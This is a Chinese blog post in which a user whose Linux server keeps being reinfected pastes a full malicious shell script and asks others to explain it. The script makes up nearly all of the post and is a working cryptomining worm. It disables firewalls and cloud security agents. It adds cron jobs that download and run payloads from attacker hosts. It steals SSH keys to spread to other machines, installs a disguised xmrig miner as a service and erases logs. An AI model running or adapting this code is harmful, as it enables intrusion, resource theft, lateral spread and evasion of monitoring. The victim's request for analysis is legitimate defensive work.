linux 被攻击了,重装系统修改密码了也还是经常复发,咋整

最新推荐文章于 2023-09-24 09:41:56 发布
最新推荐文章于 2023-09-24 09:41:56 发布
阅读量658 收藏 1
点赞数
文章标签: bash linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42622763/article/details/119885262
版权 
#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin

setenforce 0 2>/dev/null
ulimit -n 65535
ufw disable
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F
echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf
sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
mv /usr/bin/ps.original /usr/bin/ps
netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep '/usr/sbin/sshd' | grep 'sshgood' | grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

der(){
  if ps aux | grep -i '[a]liyun'; then
    /etc/init.d/aegis uninstall
    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    sudo pkill aliyun-service
    killall -9 aliyun-service
    sudo pkill AliYunDun
    killall -9 AliYunDun
    iptables -I INPUT -s 100.100.30.1/28 -j DROP
    iptables -I INPUT -s 140.205.201.0/28 -j DROP
    iptables -I INPUT -s 140.205.201.16/29 -j DROP
    iptables -I INPUT -s 140.205.201.32/28 -j DROP
    iptables -I INPUT -s 140.205.225.192/29 -j DROP
    iptables -I INPUT -s 140.205.225.200/30 -j DROP
    iptables -I INPUT -s 140.205.225.184/29 -j DROP
    iptables -I INPUT -s 140.205.225.183/32 -j DROP
    iptables -I INPUT -s 140.205.225.206/32 -j DROP
    iptables -I INPUT -s 140.205.225.205/32 -j DROP
    iptables -I INPUT -s 140.205.225.195/32 -j DROP
    iptables -I INPUT -s 140.205.225.204/32 -j DROP
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
    rm -rf /usr/local/cloudmonitor
  elif ps aux | grep -i '[y]unjing'; then
    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
    for i in ${process[@]}
    do
      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
      do
        kill -9 $A
      done
    done
    chkconfig --level 35 postfix off
    service postfix stop
    /usr/local/qcloud/stargate/admin/stop.sh
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/stop.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    rm -rf /usr/local/sa
    rm -rf /usr/local/agenttools
    rm -rf /usr/local/qcloud
    rm -f /etc/cron.d/sgagenttask
  fi
  sleep 1
  echo "DER Uninstalled"
}

if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB

url="agent.apacheorg.xyz:1234"
ipurl="http://192.210.200.66:1234"


cronlow(){
  cr=$(crontab -l | grep -q $url | wc -l)
  if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
  else
    echo "cronlow skip"
  fi
}

cron(){
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
  then
    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
    crontab -r
  fi
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
  then
    echo "Cron exists"
  else
    apt-get install -y cron
    yum install -y vixie-cron crontabs
    service crond start
    chkconfig --level 35 crond on
    echo "Cron not found"
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
    mkdir -p /var/spool/cron/crontabs
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
    mkdir -p /etc/cron.hourly
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
  fi
  chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
  echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}


localgo() {
  echo "localgo start"
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          ((i++))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi

          #Wait 5 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
        done
      done
    done
  done
  # scangogo
  echo "local done"
}

setupxmrservice(){
  echo "[*] Removing previous c3pool miner (if any)"
  if sudo -n true 2>/dev/null; then
    sudo systemctl stop c3pool_miner.service
  fi
  killall -9 xmrig

  echo "[*] Removing $HOME/c3pool directory"
  rm -rf $HOME/c3pool
  mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
  if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
    $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
    # preparing script

    echo "[*] Creating $HOME/c3pool/miner.sh script"
    mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
    chmod +x /usr/sbin/.rsyslogds.sh
    /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
    # preparing script background work and work under reboot
    if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
      echo "[*] Enabling huge pages"
      echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
      sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    fi

    if ! type systemctl >/dev/null; then

      echo "[*] Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
      /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
      echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
      echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."

    else

      echo "[*] Creating c3pool_miner systemd service"
      sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
      echo "[*] Starting c3pool_miner systemd service"
      sudo killall xmrig 2>/dev/null
      sudo systemctl daemon-reload
      sudo systemctl enable rsyslogds.service
      sudo systemctl start rsyslogds.service
      echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
    fi
  fi
}

der

if [ -w /usr/sbin ]; then
    SPATH=/usr/sbin
  else
  SPATH=/tmp
fi
echo $SPATH

cat >/tmp/.rsyslogds.sh <<EOL
#!/bin/bash
x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
if [ "$x_md52" = "$x_md51" ]; then
  if ! pidof .rsyslogds >/dev/null; then
    /usr/sbin/.rsyslogds
  fi
else
  $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
  pkill .rsyslogds
  /usr/sbin/.rsyslogds
fi
EOL

cat >/tmp/rsyslogds.service <<EOL
[Unit]
Description=rsyslogdservice
[Service]
ExecStart=/usr/sbin/.rsyslogds
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL

MD5_1_XMR="5efc68ad277fe3fc36bfdf7671d8b1de"
MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`

if [ "$SPATH" = "/usr/sbin" ]
then
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
  then
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    setupxmrservice
    localgo
    cron
  else
    $SPATH/.rsyslogds
    setupxmrservice
    localgo
    cron
  fi
else
  $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
  cronlow
fi

if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
then
  $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis;$SPATH/.inis
else
  echo "ok"
fi

history -c
der
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history

来个大神给解读一下脚本呗!

没名了吗
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【安全】查杀linuxc3pool挖矿病毒xmrig
飞的博客
03-05 1094
病毒来源安装脚本旷池提供的卸载脚本。
linux操作系统下修改root密码
08-20
linux操作系统下各种情况下修改root密码linux操作系统下各种情况下修改root密码
linux系统重装导致免密码key登录失败的解决方法
01-10
在一台linux机器上ssh远程另外一台linux服务器时候出现: [root@server .ssh]# ssh 192.0.50.80 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NAS
一次Linux系统被攻击的分析过程.pdf
09-06
一次Linux系统被攻击的分析过程.pdf
挖矿病毒zz.sh——记一次linux(centos)成为矿机后的排查与修复过程
m0_37313888的博客
09-27 1万+
我们工作组的主机集群某天被发现cpu利用率600%多,显然被种了后门来挖矿。写一下这篇文章来记录排查过程中遇到的问题。 1.怎么发现变矿机? 1)top 发现cpu炸了。这个也是常见的查看方法 2) netstat -natp 发现有几个异常的tcp连接,一查ip,发现是俄罗斯,荷兰的ip,估计主机被人种后门了 2.具体流程 crontab -l ,发现果然有一分钟一次的定时任务,...
xmrig挖矿病毒导致Postgresql数据库掉线
kite99的博客
04-18 1119
xmrig挖矿病毒导致Postgresql数据库断线。清除病毒数据库工作正常。
服务器被植入挖矿病毒-xmrig
最新发布
weixin_53299145的博客
09-24 1335
今天早晨登录宝塔面板发现服务器CPU占用率和内存都爆满了,赶紧检查一下服务器的进程使用top命令查看服务器的cpu和内存占用情况。
网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御
Fortinet_CHINA的博客
12-30 3364
起底Apache Log4j漏洞: 如何出现、如何被利用与如何防御 受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务 受影响用户: 任何使用Log4j的具备该漏洞版本的组织 影响: 远程攻击者控制漏洞系统 漏洞等级: 高危 自12月9日起,一个新型高危漏洞开始在全球肆虐,引起全球互联网用户的广泛关注,此漏洞发现于Apache Log4j框架中,该框架在全球无数服务器中均有部署。该漏洞的官方名称为CVE-2021-44228,俗称“Log4Shell”。 攻击者可直接构造恶意
一次服务器被入侵的处理过程分享
「 虚幻私塾」
08-31 491
Linux 操作系统的动态链接库加载过程中,动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库,LD_PRELOAD 环境变量和 /etc/ld.so.preload 配置文件中指定的动态链接库依然会被装载,它们的优先级比 LD_LIBRARY_PATH 环境变量所定义的链接库查找路径的文件优先级要高,所以能够提前于用户调用的动态库载入。,我在生活和现实面前低头了。...
挖矿一键脚本_猫池挖矿事件分析
weixin_39588445的博客
12-12 2067
一、背景近期发现一起Weblogic wls-wsat反序列化漏洞利用攻击事件,利用该漏洞执行powershell系统命令,伪装矿池地址,不易被发现,静默下载猫池(c3pool.com)挖矿脚本,并执行脚本下载XMR挖矿程序并进行挖矿。猫池会在多种算法的N个币中,选择利润最高的币去挖,因此猫池收益高于只挖一个币的传统矿池。智能模块会根据某个币的交易所价格,交易所深度,挖矿难度(全网算力)...
另辟蹊径重装Linux系统.pdf
09-06
另辟蹊径重装Linux系统.pdf
Linux C语言 线程池模型:线程池的创建、销毁、扩容、减容,模拟线程处理任务过程,加锁、解锁、回调函数
CLZHIT的博客
03-26 638
线程池(英语:thread pool):一种线程使用模式。线程过多会带来调度开销,进而影响缓存局部性和整体性能。而线程池维护着多个线程,等待着监督管理者分配可并发执行的任务。这避免了在处理短时间任务时创建与销毁线程的代价。线程池不仅能够保证内核的充分利用,还能防止过分调度。可用线程数量应该取决于可用的并发处理器、处理器内核、内存、网络sockets等的数量。 例如,线程数一般取cpu数量+2比较合...
安全事件管理处置——操作实例
weixin_54055099的博客
09-30 1369
安全事件管理与处置的操作实例
linuxpool
wjfdsklfdkfksd的博客
05-18 415
它可以同时监视多个文件描述符,当其中任意一个文件描述符发生读写事件时,就会通知程序进行相应的处理。与 select 不同的是,poll 函数使用一个结构体数组来存储需要监视的文件描述符,而不是使用 fd_set 集合。此外,poll 函数没有最大文件描述符数量的限制,也不会改变传入的 nfds 参数的值,因此使用起来更加方便。例如,如果要监视三个文件描述符,那么 nfds 的值应该是 4。,因为 poll 函数还需要监视一个额外的文件描述符,即用于中断 poll 函数阻塞的文件描述符。
彻底清除Centos xmrig木马(普通用户情况)
热门推荐
桂圆的博客
04-14 1万+
文章目录一、排查:二、解决三、后序 情况: 开发同事报update用户连接不上系统,故此上服务器查看 由于是docker建立的系统没怎么在意安全,密码设置很简单 一、排查: # su - update 发现密码已经错误 # top ![top命令查看](https://img-blog.csdnimg.cn/20210414183615426.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cH
linux密码改了重启就还原,linux redis重置密码、重启
weixin_39998859的博客
05-10 376
1、把redis下面的redis.conf文件里面的#requirepass foobared去掉注释,foobared改为自己的密码,我在这里改为requirepass 1234562、启动redis服务./redis-server redis.conf &这里主要redis.conf的路径,还有尤其注意后面那个&,因为不带&是界面版启动,关闭界面的话,redis就跟着关...
服务器病毒,侵占CPU资源
Climber4211的博客
08-20 1184
以下是我从服务器中的病毒里找到的一个文件,从中学到不少知识,现在将这个病毒分析一下,本人只是一个开发,服务器被这个病毒侵占CPU挖矿,没办法,只能研究这个病毒,看怎么让我的服务器访问速度快点。 具体的讲解我也是看到了别人的文章,挂出来 第一篇文章 第二篇感觉讲的很详细 这个病毒最主要的表现是CPU 被占用,自己的服务打开速度奇慢,甚至打不开 #!/bin/bash SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin setenforce 0 2>/d
linux 启动盘重装系统
08-07
要使用Linux启动盘重装系统,您需要按照以下步骤操作: 1. 下载适合您的Linux发行版的ISO镜像文件,并将其写入USB启动盘或DVD光盘中。 2. 将启动盘插入需要重装系统的计算机,并在启动时选择从USB或DVD启动。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

没名了吗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值